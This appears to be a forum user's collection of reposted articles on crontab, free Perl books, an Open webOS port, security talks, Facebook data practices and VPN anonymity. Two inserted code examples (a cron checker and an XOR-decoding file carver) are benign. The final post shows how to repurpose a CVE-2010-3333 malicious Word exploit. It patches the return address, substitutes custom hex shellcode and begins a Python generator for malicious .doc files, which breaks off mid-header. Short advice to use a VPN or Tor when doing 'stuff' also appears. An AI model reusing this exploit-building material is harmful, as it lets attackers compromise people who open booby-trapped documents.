Everything posted by Nytro
-
[h=2]How to: Use crontab to schedule tasks[/h]
Sunday, January 06, 2013

If you want to schedule a command or script to run periodically, crontab is a very useful tool. To add a command or a script to the crontab schedule, the command you need to use is:

sudo crontab -e

On my Arch Linux box, the default text editor is "vi", but on Linux Mint, when you run this command the first time, you will be asked to choose a text editor. Similarly, the crontab file of Arch Linux is completely blank, while the one of Linux Mint has many useful comment lines to help you understand how to use crontab. Here is how the crontab file looks on Linux Mint (the text editor is nano):

The comment lines in the image above explain quite well how to use crontab. The format to schedule a task with crontab is:

* * * * * /any/command/or/script

As you can see, there are 5 stars (with a space between each 2 stars) and each star represents one part of the date format in the following order:

- minute (value = 0 -> 59)
- hour (0 -> 23)
- day of month (1 -> 31)
- month (1 -> 12)
- day of week (0 -> 6 with 0 = Sunday)

In short, to set a certain period to run a script, you just need to replace each star with a specific value.

Note: If you don't need to set any value for a star, just leave the star in the command. A star means "every", so a command with all 5 stars will run a task every minute until you delete this command from the crontab schedule.

For example, to run a script at 7:00 AM on every Monday in the first three months of the year, the command will be:

0 7 * 1-3 1 /path/to/the/script

As you can see, crontab is quite flexible with its format. You can use 1-5 in the day of week value to schedule a task to be run on work days. Or to run something on Monday, Tuesday and Thursday only, you can use 1,2,4 for the day of week value.

For example, to run a script every 20 minutes on Monday, Tuesday and Thursday in January, Feb, May and Oct, the command will be:

0,20,40 * * 1,2,5,10 1,2,4 /path/to/the/script

Crontab also has some special keywords for you to use:

- @reboot: at startup
- @yearly: once a year
- @annually: ( == @yearly)
- @monthly: once a month
- @weekly: once a week
- @daily: once a day
- @midnight: ( == @daily)
- @hourly: once an hour

If you use the keywords, you don't need to use the stars. For example, to run a script once every day, the command will be:

@daily /path/to/the/script

After you insert the right command into the crontab file, just save the file and everything is scheduled. To check the tasks you have scheduled with crontab, the command to use is:

sudo crontab -l

Source: How to: Use crontab to schedule tasks ~ Linux and Life
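To check what a schedule line really does before it goes into root's crontab, the following added example (not part of the original post) expands the five fields, lists, ranges and @keywords described above and tests a timestamp against them. The function names are hypothetical, and it also covers one case the post does not mention: when both day of month and day of week are restricted, cron runs the job if either one matches.

```python
from datetime import datetime

# Field names and allowed ranges, in crontab order.
FIELDS = [("minute", 0, 59), ("hour", 0, 23), ("day of month", 1, 31),
          ("month", 1, 12), ("day of week", 0, 6)]

# Time-based keywords and the five-field schedules they stand for.
KEYWORDS = {
    "@yearly": "0 0 1 1 *", "@annually": "0 0 1 1 *",
    "@monthly": "0 0 1 * *", "@weekly": "0 0 * * 0",
    "@daily": "0 0 * * *", "@midnight": "0 0 * * *",
    "@hourly": "0 * * * *",
}


def expand_field(text, low, high, name):
    """Turn '*', '5', '1-3' or '1,2,4' into the set of values it allows."""
    values = set()
    for part in text.split(","):
        if part == "*":
            start, end = low, high
        elif "-" in part:
            first, last = part.split("-", 1)
            start, end = int(first), int(last)
        else:
            start = end = int(part)
        if not low <= start <= end <= high:
            raise ValueError(f"{name}: {part!r} is outside {low}-{high}")
        values.update(range(start, end + 1))
    return values


def parse_entry(line):
    """Return (field sets, dom_is_star, dow_is_star, command) for one line."""
    line = line.strip()
    if line.startswith("@"):
        keyword, command = line.split(None, 1)
        if keyword == "@reboot":
            raise ValueError("@reboot runs at startup and has no time fields")
        line = KEYWORDS[keyword] + " " + command
    parts = line.split(None, 5)
    if len(parts) != 6:
        raise ValueError("expected five time fields followed by a command")
    sets = [expand_field(text, low, high, name)
            for text, (name, low, high) in zip(parts[:5], FIELDS)]
    return sets, parts[2] == "*", parts[4] == "*", parts[5]


def matches(line, when):
    """True if the crontab line would fire at the minute given by `when`."""
    (minute, hour, dom, month, dow), dom_star, dow_star, _ = parse_entry(line)
    if when.minute not in minute or when.hour not in hour:
        return False
    if when.month not in month:
        return False
    cron_dow = (when.weekday() + 1) % 7  # Python: Monday=0, cron: Sunday=0
    dom_ok = when.day in dom
    dow_ok = cron_dow in dow
    if dom_star or dow_star:
        return dom_ok and dow_ok
    # Both day fields restricted: cron fires when either of them matches.
    return dom_ok or dow_ok


if __name__ == "__main__":
    entry = "0 7 * 1-3 1 /path/to/the/script"
    for day in range(6, 9):
        when = datetime(2013, 1, day, 7, 0)
        print(when.strftime("%a %Y-%m-%d %H:%M"), matches(entry, when))
```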
-
16 of the Best Free Perl Books

Individuals wanting to learn and develop their understanding of the Perl programming language have a huge selection of books to choose from. There are hundreds of enlightening Perl books that are available to purchase at reasonable cost. However, given that Perl is an open source programming language, with an eclectic heritage written by Larry Wall and a cast of thousands, it is satisfying to see that some authors have made their Perl publications available to download without charge, and released under a freely distributable license.

Perl is a high-level, general-purpose, interpreted, scripting, dynamic programming language released under the GPL or Artistic license. It is available for most operating systems. Perl is implemented as an interpreted (not compiled) language. It is procedural, with variables, expressions, assignment statements, control structures, blocks and subroutines. Whilst Perl is not an acronym, it is sometimes known as Practical Extraction and Report Language and lightheartedly as the Pathologically Eclectic Rubbish Lister.

Perl can be used for a large number of tasks. It is often used to write CGI scripts. It is also frequently used for text manipulation, general web programming, networking, system administration, prototyping, database access, and graphical programming.

One of the most powerful features of Perl is its extensive library of modules. Many of these modules are available from the Comprehensive Perl Archive Network, which mirrors over 100,000 Perl modules.

The focus of this article is to select some of the finest Perl books which are available to download for free. The majority of the books featured here can also be freely distributed. So get reading, learning and sharing.

1. Modern Perl

[TABLE=width: 100%]
[TR] [TD]Website[/TD] [TD]www.onyxneon.com/books/modern_perl/index.html[/TD] [/TR]
[TR] [TD]Author[/TD] [TD]chromatic[/TD] [/TR]
[TR] [TD]Format[/TD] [TD]PDF, A4 PDF, HTML, ePub[/TD] [/TR]
[TR] [TD]Pages[/TD] [TD]204[/TD] [/TR]
[/TABLE]

Modern Perl is designed to help programmers of all levels of proficiency. The book is not only a Perl tutorial. It concentrates on Perl 5.12 and 5.14, to demonstrate the latest and most effective time-saving features. Modern Perl explains how and why the language works, so that the full power of Perl can be unleashed.

Modern Perl is one way to describe the way the world's most effective Perl 5 programmers work. They use language idioms. They take advantage of the CPAN. They show good taste and craft to write powerful, maintainable, scalable, concise, and effective code.

This book provides a wealth of information on:

- The Perl Philosophy
- Perl and its Community, focusing on CPAN, community and development sites
- The Perl Language, introducing names, variables, values, control flow, scalars, arrays, hashes, coercion, packages, references, and nested data structures
- Operators - a series of one or more symbols used as part of the syntax
- Functions - a discrete, encapsulated unit of behaviour
- Regular Expressions and Matching - the use of these expressions gives Perl its incredible text processing power
- Objects - discrete, unique entities with their own identities
- Style and Efficacy, explaining the importance of writing maintainable, idiomatic, and effective Perl
- Managing Real Problems, covering testing, handling warnings, files, modules, distributions, and more
- Perl Beyond Syntax
- What to Avoid

The electronic versions of this book are released under the Creative Commons Attribution-NonCommercial-NoDerivs 3.0 Unported License.

2. Beginning Perl

[TABLE=width: 100%]
[TR] [TD]Website[/TD] [TD]www.perl.org/books/beginning-perl/[/TD] [/TR]
[TR] [TD]Author[/TD] [TD]Simon Cozens[/TD] [/TR]
[TR] [TD]Format[/TD] [TD]PDF, HTML[/TD] [/TR]
[TR] [TD]Pages[/TD] [TD]672[/TD] [/TR]
[/TABLE]

Beginning Perl is a book which, as its name suggests, is written for individuals that are new to programming who want to learn Perl. It starts from the absolute basics of Perl, guiding the reader carefully through up to complex operations such as using Perl as a CGI language.

The book covers the following topics:

- Installing Perl on Windows and UNIX
- Making use of online Perl resources like CPAN
- First principles in programming and the Perl syntax
- Working with simple values
- Lists and Hashes
- Loops and Decisions
- Regular Expressions
- Working with files and databases
- Writing web pages in Perl
- Subroutines
- Running and Debugging Perl
- Modules
- Using Perl as an object-oriented language
- Perl and Databases
- The World of Perl

The book is licensed under the Creative Commons Attribution-NoDerivs-NonCommercial License.

The rest of the books: http://www.linuxlinks.com/article/2013010507211097/16oftheBestFreePerlBooks-Part1.html
-
[h=1]WebOS Ports gets Open webOS up and running on the Google Nexus 7[/h]
by Derek Kessler
Mon, 31 Dec 2012 1:05 pm EST

As if the Samsung Galaxy Nexus Open webOS port wasn't enough, WebOS Ports has announced a new porting project: Open webOS on the Google Nexus 7. The seven-inch Android-powered tablet built by Asus was the premiere launch device for Android 4.1 Jelly Bean, and thanks to the open source and open hardware nature of the device, it is the perfect fit for WebOS Ports's next porting adventure.

Seeing how much we loved the small seven-inch TouchPad Go, it's no surprise that the equally small Nexus 7 tablet was on the radar of WebOS Ports. Though larger, the 1280x800 screen on the Nexus 7 is close enough in pixel dimensions to the 1280x720 screen on the Galaxy Nexus, so a lot of the work put into the smartphone project could be easily translated to the Nexus 7. How easy? This work was led by WebOS Ports's Simon "morphis" Busch over the course of about a week while he was on winter break from college.

The port was accomplished with the Galaxy Nexus project in conjunction with LibHybris, created by Carsten Munk (an engineer at Jolla, though he also leads Merproject, which grew out of Sailfish ancestors Maemo and Meego), a library that allows for "bionic-based [Android] hardware adaptations in glibc systems", in essence making it easier to translate between the designed-for-Android hardware and Linux-based software like the Open webOS operating system. This means that with LibHybris the WebOS Ports team won't have to write drivers from scratch for different Android-based devices they might wish to attack. In addition to LibHybris, the Nexus 7 leverages the work of those involved in Merproject, FreeSmartphone, and SHR Project.

A video of the port in action is after the break, and as an early alpha we're rather impressed. Open webOS on the Nexus 7 runs generally smoothly (there's some intermittent and infrequent lag, which isn't anything too surprising at this stage) and has improved considerably from our last look at Open webOS on the Galaxy Nexus. In addition there's now an Enyo 2-based Settings app that allows you to toy with things like the Wi-Fi and brightness settings and the new OWO Memos app (also Enyo 2 based). The port also supports the classic webOS tablet keyboard, the made-for-the-Galaxy-Nexus virtual gesture area, and forward-swipe-driven screen rotation. Essentially, it's like webOS on the TouchPad Go, except on the slimmer, lighter, faster, newer Nexus 7 and more open source-y.

Oh, and did we mention that it runs untethered now? Yeah, it does that. Being able to use Open webOS on the device without being hooked up to your computer is a big deal, and we're really quite psyched to see that happen. You still have to boot from a desktop, but after that you can unplug the cable and get on with the webOSing.

The Nexus 7 Open webOS port is still in its early stages, but thanks to the work done on the Galaxy Nexus port it's come a long way in a relatively short time. We're looking forward to what's coming next.

Source: WebOS Ports gets Open webOS up and running on the Google Nexus 7 | webOS Nation
-
http://www.youtube.com/watch?v=w9X1CP_jF6k
-
And what if, for example, I use Autoruns? Or 20 other utilities?
-
Smartmeter

Description: SMARTMETER: A technological overview of the German roll-out

This talk will give an overview on the technology, the laws and the technical guidelines of the smartMeter roll-out in Germany.

SmartMeter are an ongoing topic in many countries. Sometimes the roll-out is driven by companies, sometimes by laws. Implementation fails, security nightmares and privacy issues have been covered even by the lamestream media. The next big roll-out will happen in Germany. This talk will give an overview of the planned roll-out and the laws and technical guidelines.

The “Energiewirtschaftsgesetz” (ENWG) was renewed in 2005 and amended in the following years to reflect aspects like smart grids and renewable energy sources. It also covers the energy directives. The important aspect is that it makes the roll-out a law. In charge of the roll-out is the “Bundesministerium für Wirtschaft und Technologie” (BMWi), which delegates the task of defining the technical details to the “Bundesamt für Sicherheit in der Informationstechnik” (BSI). The BSI therefore is in the process of developing a so-called protection profile (PP) (or common criteria) for smart meter gateways and the security module used in a smart meter. The BSI also develops a technical guideline (TR 03109) which describes how the communication-related details of the whole smart meter infrastructure have to be implemented to provide security and interoperability.

This talk will present the different roles defined by the TR and PP. The rights and duties of the different roles in the model will be presented. The cryptographic mechanisms that will be used to secure the communication will be shown. Further, the additional services that are planned to be supported and the use cases that are defined for the smart metering system will be explained.

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.

Source: Smartmeter
-
At Clubhack 2012: Talk On Owasp Xenotix Xss Exploit Framework V2

Description: At ClubHack 2012: Talk on OWASP Xenotix XSS Exploit Framework v2

Xenotix XSS Exploit Framework is a penetration testing tool to detect and exploit XSS vulnerabilities in Web Applications.

https://www.owasp.org/index.php/OWASP_Xenotix_XSS_Exploit_Framework

Source: At Clubhack 2012: Talk On Owasp Xenotix Xss Exploit Framework V2
-
[h=1]How social networks like Facebook plan to make money[/h]

Reaching millions of consumers (potential customers)

There are many ways to reach a particular audience in marketing. One of them is drawing up a questionnaire to gain a solid understanding of your own customer base and of the media in which to advertise your product in order to sell it best. For example, if you are selling a new tractor for a farm, you will advertise it in a magazine bought mainly by farmers. That way you cover a market segment that will give you the highest sales volume.

The Internet and cookies

If I own software that analyzes how often farmers in a given territory make purchases... for example, I can set cookies on a website that sells tractors online in order to record where the people who visit the site come from, who sells or buys these tractors, and so on. If you used my services, I could tell you which agricultural fair you should go to for the best chance of selling your tractors, because my cookies detected many potential customers in that area.

How much would you be willing to pay for such a marketing service? The investment needed to find potential customers would drop enormously, since you would not have to hire an army of salespeople to prospect the market for years and years.

In this way, Facebook and social networks in general use such cookies, or could use them, to find the buyers of various products, whether luxury goods or everyday items. Companies would only have to buy these lists.

Such lists are available from advertising agencies all over the world. They have a starting price that varies depending on the market you want to target. The more specialized the list, the more it costs to create and the higher its selling price.

A basic list (last name, first name, address, phone number, etc.) costs about 40 dollars per 1000 potential customers in the USA.

A list with information such as occupation, city of residence, number of properties acquired over a lifetime, the buyers' lifestyle, etc., has an average price of about 120 dollars per 1000 potential customers, also in the USA.

Today Facebook goes even further, thanks to cookies and consumers' buying habits. This will make it possible to target millions of people precisely, with reliability increased by 500%, because Facebook can use word-recognition software on its own site. For example, the software can track everyone who has used the words Mercedes Benz in their posts. Facebook will thus be able to build an extremely precise marketing list. And of course, the price of such a list goes up.

Imagine you are on Facebook, chatting with your brother or a brother-in-law, and at some point you say: "Yes, I'm thinking of buying a new car, a Mercedes Benz, in a couple of days." The software retrieves your name, your username, the city you live in, your occupation and any other relevant information in order to work out which car dealership you might buy the car from. A Facebook representative will call that dealership and agree to provide it with this information in exchange for a sum of money. You will get a phone call from that dealership, inviting you to take advantage of an offer you can't refuse... And that is how we get a type of marketing with an extremely precise target. And this practice will bring the Facebook network billions of dollars in revenue.

Such a list can reach 2500 or even more than 5000 dollars per 1000 potential customers, multiplied, of course, by the number of Facebook users.

Of course, Facebook will also set up partnerships and links with other sites, recommend purchases to its members through other sites, and other things of that kind (indirect marketing). You can get at least a rough idea of the wealth this company holds. And this process is going to be implemented by all the social networks that currently exist on the web.

Source: How social networks like Facebook plan to make money
-
[h=4]Which VPN Service Providers Really Take Anonymity Seriously?[/h]

If you are going to do "stuff" anyway, don't take risks. Use at least a VPN (like the ones here). If that is not OK, then Tor.

Link: http://torrentfreak.com/which-vpn-providers-really-take-anonymity-seriously-111007/
-
When the cops subpoena your Facebook information, here's what Facebook sends the cops

The information is NOT new, but I find it useful.

Published Apr 06 2012, 08:30 AM by Carly Carioli

-- would not have been possible without access to a huge trove of case files released by the Boston Police Department. Many of those documents have never been made public -- until now. As a kind of online appendix to the article, we're publishing over a dozen documents from the file, ranging from transcripts of interviews to the subpoenas that investigators obtained from the tech companies that helped them track the killer's digital fingerprints. We've also published the crime scene photos and uploaded recordings made by investigators as they interviewed the killer, Philip Markoff, and others involved in the case.

One of the most fascinating documents we came across was the BPD's subpoena of Philip Markoff's Facebook information. It's interesting for a number of reasons -- for one thing, Facebook has been pretty tight-lipped about the subpoena process, even refusing to acknowledge how many subpoenas they've served. Social-networking data is a contested part of a complicated legal ecosystem -- in some cases, courts have found that such data is protected by the Stored Communications Act.

In fact, we'd never seen an executed Facebook subpoena before -- but here we have one, including the forms that Boston Police filed to obtain the information, and the printed (on paper!) response that Facebook sent back, which includes text printouts of Markoff's wall posts, photos he uploaded as well as photos he was tagged in, a comprehensive list of friends with their Facebook IDs (which we've redacted), and a long table of login and IP data.

This document was publicly released by Boston Police as part of the case file. In other case documents, the police have clearly redacted sensitive information. And while the police were evidently comfortable releasing Markoff's unredacted Facebook subpoena, we weren't. Markoff may be dead, but the very-much-alive friends in his friend list were not subpoenaed, and yet their full names and Facebook IDs were part of the document. So we took the additional step of redacting as much identifying information as we could -- knowing that any redaction we performed would be imperfect, but believing that there's a strong argument for distributing this, not only for its value in illustrating the Markoff case, but as a rare window into the shadowy process by which Facebook deals with law enforcement. As far as we can tell, nobody's ever seen what one of these looks like -- and we're hoping the social media, law, and privacy experts out there can glean insight from it:

You can find the PDF here: http://blog.thephoenix.com/BLOGS/phlog/archive/2012/04/06/when-police-subpoena-your-facebook-information-heres-what-facebook-sends-cops.aspx
-
Reversing a Malicious Word Document
Anonymous
January 04, 2013

In this post, I am going to explain in detail how to go about reversing an exploit with which one can easily insert his/her own payload, provided an exploit sample is available. I have taken an exploit sample for CVE-2010-3333 in order to complete this exercise.

So let’s first explore this document (Laden’s Death.doc) to see whether it’s an exploit or not by just looking at it in a hex editor. We know that the vulnerability exists in pFragment, so in the given sample we have to find the parameter of pFragment and look for something suspicious.

When I opened the document in hex, I found something suspicious: an address in the pFragment parameter, bc41db77. Let’s search for this address in the debugger (77db41bc):

Address not found. That’s why, when I executed this sample, it crashed, as shown in the following picture:

Anyway, I am not going to explain the crash analysis here. Our goal is to replace the payload in this exploit with our own payload. But, in brief, it’s crashing because the address used in this exploit sample (77db41bc) is taken from user32.dll of xp sp2, but I am using xp sp3, so this address is not available.

It can be made workable on xp sp3 by taking any address from the xp sp3 dll. I took the ‘jmp esp’ address from kernel32.dll and replaced it with 7b46867c (jmp esp address of kernel32.dll xp service pack 3). Then it worked fine.

When the RTF file is opened, the exploit executes the shell code and drops a file named server.exe inside C:/RECYCLER and executes it.
C:/RECYCLER/server.exe does the following:

• Drops a file in the system’s temp folder: vmm2.tmp
• File vmm2.tmp is renamed and moved to c:\windows\system32\dhcpsrv.dll
• Makes registry modifications in an attempt to hijack the DHCP service

The payload has the ability to:

• Download additional malware
• Connect and send sensitive data back to remote servers
• Act as a trojan proxy server

So let me first analyze the shell code for server.exe, where there are actually two ways to analyze it:

1) In hex editor
2) In debugger

Let me open the sample in a hex editor and try to find the shell code for server.exe.

While analyzing in hex we found something suspicious; that is address 7b46867c. This address has been taken from the ntdll file, and the shell code begins from eb10 till eeeeeeeeeeee, as shown in the following figure:

After a deep analysis, we found that the shell code has been encrypted by 8-bit EE XOR, as in the instruction

XOR BYTE PTR DS:[EDX+ECX], 0EE

Also, encryption begins from last to start, that is from eeeeeeee to the start of the shell code.

Now it’s time to replace the full shell code by your own code. I have the following shell code that will execute calc from our server:

[TABLE] [TR] [TD=class: code]eb7131c9648b71308b760c8b761c8b5e088b7e208b3666394f1875f2c3608b6c24248b453c8b54287801ea8b4a188b5a2001ebe334498b348b01ee31ff31c0fcac84c07407c1cf0d01c7ebf43b7c242875e18b5a2401eb668b0c4b8b5a1c01eb8b048b01e88944241c61c3e892ffffff5deb05e8f3ffffff89ef83ef8989ee83. [/TD] [/TR] [/TABLE]

So I will replace the existing shell code with our own code. After replacing, the sample looks like this:

Now, after executing it, it should execute calc.

Wow, calc pops up.

Now it’s time to analyze the dropped dll, which has been dropped into system32 with the name of dhcpsrv.dll.

After analyzing, we see that the exploit sample is dropping dhcpsrv.dll in the c:\windows\system32 folder, as in the picture, and that is going to be executed by rundll32.exe.
We will analyze the dropped dll (dhcpsrv.dll) further, but first we have to attach it with the debugger. There is a process in attaching the debugger. I am going to attach it with WinWord, as it is an Office document file.

After attaching and before executing, we have to set a breakpoint (F2) in the debugger on various win32 functions. Here you will get a clear picture once you reverse two or three samples yourself. I am going to write here the common functions on which it is desirable to set a breakpoint before reversing. They are:

CreateFile, ReadFile, WriteFile, SetFilePointer, LoadLibraryA, LoadLibrary, etc.

After setting a breakpoint, we have to Step Over (F8) in the debugger and while doing this we will have to look carefully for some suspicious address in the stack window of the debugger (bottom right). We mainly analyze the load library function also and, while analyzing, we look to see if there is any library or any function that gets loaded by some suspicious address (“suspicious” means an address that does not belong to the kernel).

After a long analysis, we find that the CreateFile function gets loaded at a suspicious address (0011f438). A point to be noted is that this address may change from computer to computer.

Now our main job should be to find the actual location of the embedded dll/exe, that is the start location of exe/dll, the end location, the size of the embedded exe/dll, and the algorithm by which exe/dll has been encrypted. We will start analyzing line by line from the beginning of the suspicious address.

In the above picture, look at the stack window. There is a call to the CreateFileA function from address 0011F438. Now our next work is to start analyzing from this address, so we will set a Break Point at 0011F438.

We find the following instructions:

0011F54E  AC     LODS BYTE PTR DS:[ESI]
0011F54F  3C 00  CMP AL, 0
0011F551  74 06  JE SHORT 0011F559
0011F553  3C FC  CMP AL, 0FC
0011F555  74 02  JE SHORT 0011F559
0011F557  34 FC  XOR AL, 0FC
0011F559  AA     STOS BYTE PTR ES:[EDI]
0011F55A  E2 F2  LOOPD SHORT 0011F54E

Let’s look at the two boldfaced instructions:

0011F54E  AC     LODS BYTE PTR DS:[ESI]

This instruction reads the address stored at ESI and stores its value to EAX, while the instruction

0011F559  AA     STOS BYTE PTR ES:[EDI]

stores the value of EAX to the EDI.

So the encryption algorithm is to read each byte of the exe; if it is 0 or 0FC then leave it as it is, if not then XOR with 0FC, as in the instruction

0011F557  34 FC  XOR AL, 0FC

So we found the encryption. The next step is to find the start, end, and size of the exe. This can be found in a function like SetFilePointer. But in this sample we found this information by doing some manual analysis, as you can see in the dump window:

There is some sequence of values with ASCII 6161616161, etc.; let’s search for this value in the hex of the exploit sample:

While analyzing in the dump window of the debugger, we found that the decryption starts after }}}} (4 curly braces in the dump), so let’s move into hex to decrypt the value and try to find MZ (as MZ is the start header of the PE file). If MZ is found, it indicates that this is the beginning of the exe.

Now what is the total size of the exe? For that, we have to check the file that’s dropped into c:/windows/system32 (dhcpsrv.dll), open it in the hex editor, and find the total size; this will be the total size of the exe/dll. We find the total size of the dll is ADD8 in hex, 44504 in decimal.
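For triage of a suspicious document, the decoding rule recovered above (XOR with the key, leaving 0x00 and the key byte untouched) can be applied statically to locate and carve an embedded PE without running the sample. The block below is an added example, not part of the original article; the function names are hypothetical, the sample bytes are constructed (an inert header stub, not a real executable), and it goes beyond the article by trying every single-byte key, not only 0xFC.

```python
import struct


def xor_skip(data: bytes, key: int) -> bytes:
    """XOR each byte with `key`, leaving 0x00 and `key` itself unchanged.

    This mirrors the LODS / CMP / XOR / STOS loop shown above. The rule is
    its own inverse, so the same function encodes and decodes.
    """
    return bytes(b if b in (0, key) else b ^ key for b in data)


def looks_like_pe(buf: bytes) -> bool:
    """True if buf starts with 'MZ' and e_lfanew (offset 0x3C) points at 'PE\\0\\0'."""
    if len(buf) < 0x40 or buf[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", buf, 0x3C)
    return buf[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def find_encoded_pe(doc: bytes, keys=range(1, 256), window=0x1000):
    """Return [(offset, key), ...] for every place a PE header decodes.

    Searching for the encoded form of 'MZ' and then validating the PE
    signature avoids the many false hits a bare two-byte match would give.
    """
    hits = []
    for key in keys:
        signature = xor_skip(b"MZ", key)
        pos = doc.find(signature)
        while pos != -1:
            if looks_like_pe(xor_skip(doc[pos:pos + window], key)):
                hits.append((pos, key))
            pos = doc.find(signature, pos + 1)
    return hits


def carve(doc: bytes, offset: int, key: int, size: int) -> bytes:
    """Decode `size` bytes starting at `offset` (the article's size was 0xADD8)."""
    return xor_skip(doc[offset:offset + size], key)


def build_constructed_sample(key: int = 0xFC):
    """CONSTRUCTED test data: RTF-looking prefix, '}}}}', encoded header stub."""
    stub = bytearray(0x80)                    # 128 zero bytes, no code at all
    stub[0:2] = b"MZ"
    struct.pack_into("<I", stub, 0x3C, 0x40)  # e_lfanew -> 0x40
    stub[0x40:0x44] = b"PE\x00\x00"
    prefix = b"{\\rtf1 constructed test document }}}}"
    doc = prefix + xor_skip(bytes(stub), key) + b"aaaaaaaa"
    return doc, len(prefix), bytes(stub)


if __name__ == "__main__":
    doc, _, stub = build_constructed_sample()
    for offset, key in find_encoded_pe(doc):
        decoded = carve(doc, offset, key, len(stub))
        print(f"encoded PE header at offset {offset:#x}, key {key:#04x}, "
              f"first bytes {decoded[:2]!r}")
```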
So now we have found:

• Encryption algorithm
• Start location of dll/exe
• End location of dll/exe

Now our main job is to write the creator with the proper encryption key and start and end location. That will generate a malicious .doc file. The creator could be written in any scripting language, that is, Python, Perl, etc. I have chosen Python to write the creator, as I explain below.

The point where MZ is found is the start point of the exe.

Anyway, while analyzing this sample, one can get confused about where to insert our own payload. Do keep in mind that you have to replace the shell code at the server.exe shell code, not at the place where it is dropped in system32 (dll file).

So now it’s time to write the full creator code that I have written in Python. Here is the full creator:

import datetime
import os

header = (
"\x7B\x5C\x72\x74\x66\x31\x5C\x61\x64\x65\x66\x6C\x61\x6E\x67\x31"
"\x30\x32\x35\x5C\x61\x6E\x73\x69\x5C\x61\x6E\x73\x69\x63\x70\x67"
"\x39\x33\x36\x5C\x75\x63\x32\x5C\x61\x64\x65\x66\x66\x30\x5C\x64"
"\x65\x66\x66\x30\x5C\x73\x74\x73\x68\x66\x64\x62\x63\x68\x31\x33"
"\x5C\x73\x74\x73\x68\x66\x6C\x6F\x63\x68\x30\x5C\x73\x74\x73\x68"
"\x66\x68\x69\x63\x68\x30\x5C\x73\x74\x73\x68\x66\x62\x69\x30\x5C"
"\x64\x65\x66\x6C\x61\x6E\x67\x31\x30\x33\x33\x5C\x64\x65\x66\x6C"
"\x61\x6E\x67\x66\x65\x32\x30\x35\x32\x7B\x5C\x66\x6F\x6E\x74\x74"
"\x62\x6C\x7B\x5C\x66\x30\x5C\x66\x72\x6F\x6D\x61\x6E\x5C\x66\x63"
"\x68\x61\x72\x73\x65\x74\x30\x5C\x66\x70\x72\x71\x32\x7B\x5C\x2A"
"\x5C\x70\x61\x6E\x6F\x73\x65\x20\x30\x32\x30\x32\x30\x36\x30\x33"
"\x30\x35\x30\x34\x30\x35\x30\x32\x30\x33\x30\x34\x7D\x54\x69\x6D"
"\x65\x73\x20\x4E\x65\x77\x20\x52\x6F\x6D\x61\x6E\x3B\x7D\x7B\x5C"
"\x66\x31\x33\x5C\x66\x6E\x69\x6C\x5C\x66\x63\x68\x61\x72\x73\x65"
"\x74\x31\x33\x34\x5C\x66\x70\x72\x71\x32\x7B\x5C\x2A\x5C\x70\x61"
"\x6E\x6F\x73\x65\x20\x30\x32\x30\x31\x30\x36\x30\x30\x30\x33\x30"
"\x31\x30\x31\x30\x31\x30\x31\x30\x31\x7D\x5C\x27\x63\x62\x5C\x27"
"\x63\x65\x5C\x27\x63\x63\x5C\x27\x65\x35\x7B\x5C\x2A\x5C\x66\x61" "\x6C\x74\x20\x53\x69\x6D\x53\x75\x6E\x7D\x3B\x7D\x0D\x0A\x7B\x5C" "\x66\x33\x36\x5C\x66\x6E\x69\x6C\x5C\x66\x63\x68\x61\x72\x73\x65" "\x74\x31\x33\x34\x5C\x66\x70\x72\x71\x32\x7B\x5C\x2A\x5C\x70\x61" "\x6E\x6F\x73\x65\x20\x30\x32\x30\x31\x30\x36\x30\x30\x30\x33\x30" "\x31\x30\x31\x30\x31\x30\x31\x30\x31\x7D\x40\x5C\x27\x63\x62\x5C" "\x27\x63\x65\x5C\x27\x63\x63\x5C\x27\x65\x35\x3B\x7D\x7B\x5C\x66" "\x33\x37\x5C\x66\x72\x6F\x6D\x61\x6E\x5C\x66\x63\x68\x61\x72\x73" "\x65\x74\x32\x33\x38\x5C\x66\x70\x72\x71\x32\x20\x54\x69\x6D\x65" "\x73\x20\x4E\x65\x77\x20\x52\x6F\x6D\x61\x6E\x20\x43\x45\x3B\x7D" "\x7B\x5C\x66\x33\x38\x5C\x66\x72\x6F\x6D\x61\x6E\x5C\x66\x63\x68" "\x61\x72\x73\x65\x74\x32\x30\x34\x5C\x66\x70\x72\x71\x32\x20\x54" "\x69\x6D\x65\x73\x20\x4E\x65\x77\x20\x52\x6F\x6D\x61\x6E\x20\x43" "\x79\x72\x3B\x7D\x7B\x5C\x66\x34\x30\x5C\x66\x72\x6F\x6D\x61\x6E" "\x5C\x66\x63\x68\x61\x72\x73\x65\x74\x31\x36\x31\x5C\x66\x70\x72" "\x71\x32\x20\x54\x69\x6D\x65\x73\x20\x4E\x65\x77\x20\x52\x6F\x6D" "\x61\x6E\x20\x47\x72\x65\x65\x6B\x3B\x7D\x0D\x0A\x7B\x5C\x66\x34" "\x31\x5C\x66\x72\x6F\x6D\x61\x6E\x5C\x66\x63\x68\x61\x72\x73\x65" "\x74\x31\x36\x32\x5C\x66\x70\x72\x71\x32\x20\x54\x69\x6D\x65\x73" "\x20\x4E\x65\x77\x20\x52\x6F\x6D\x61\x6E\x20\x54\x75\x72\x3B\x7D" "\x7B\x5C\x66\x34\x32\x5C\x66\x62\x69\x64\x69\x20\x5C\x66\x72\x6F" "\x6D\x61\x6E\x5C\x66\x63\x68\x61\x72\x73\x65\x74\x31\x37\x37\x5C" "\x66\x70\x72\x71\x32\x20\x54\x69\x6D\x65\x73\x20\x4E\x65\x77\x20" "\x52\x6F\x6D\x61\x6E\x20\x28\x48\x65\x62\x72\x65\x77\x29\x3B\x7D" "\x7B\x5C\x66\x34\x33\x5C\x66\x62\x69\x64\x69\x20\x5C\x66\x72\x6F" "\x6D\x61\x6E\x5C\x66\x63\x68\x61\x72\x73\x65\x74\x31\x37\x38\x5C" "\x66\x70\x72\x71\x32\x20\x54\x69\x6D\x65\x73\x20\x4E\x65\x77\x20" "\x52\x6F\x6D\x61\x6E\x20\x28\x41\x72\x61\x62\x69\x63\x29\x3B\x7D" "\x7B\x5C\x66\x34\x34\x5C\x66\x72\x6F\x6D\x61\x6E\x5C\x66\x63\x68" 
